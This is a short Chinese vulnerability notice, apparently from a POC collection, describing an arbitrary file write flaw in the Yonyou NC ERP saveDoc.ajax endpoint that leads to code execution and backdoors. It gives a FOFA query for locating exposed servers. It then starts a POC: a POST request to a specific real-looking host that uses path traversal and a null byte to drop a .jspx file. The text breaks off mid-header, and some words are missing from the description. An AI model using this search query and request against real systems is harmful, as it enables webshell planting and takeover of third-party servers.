1.漏洞介绍
NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、、、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
用友 NC saveDoc.ajax接口处存在任意,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“用友-UFIDA-NC”
5.POC
POST http://xianglongehr.ticp.vip/uapws/saveDoc.ajax?ws=/../../MawKF.jspx%00 HTTP/1.1
Hos